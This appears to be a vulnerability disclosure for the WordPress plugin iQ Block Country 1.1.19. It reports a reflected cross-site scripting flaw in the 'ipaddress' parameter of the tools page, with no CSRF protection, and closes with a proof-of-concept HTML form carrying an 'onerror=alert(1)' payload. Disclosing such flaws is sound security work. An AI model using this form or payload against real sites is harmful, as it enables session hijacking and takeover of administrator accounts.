Hello,

Plugin: iQ Block Country in 1.1.19 https://wordpress.org/plugins/iq-block-country/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php&tab=tools

Vulnerable parameters: ipaddress

Example PHP callstack:

iqblockcountry_settings_tools   [/iq-block-country/libs/blockcountry-settings.php:211]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php&tab=tools" />

<input type="text" name="action" value="ipcheck" />

<input type="text" name="ipaddress" value='<img src=x onerror=alert(1) />'>

<input type="submit" />

</form>

--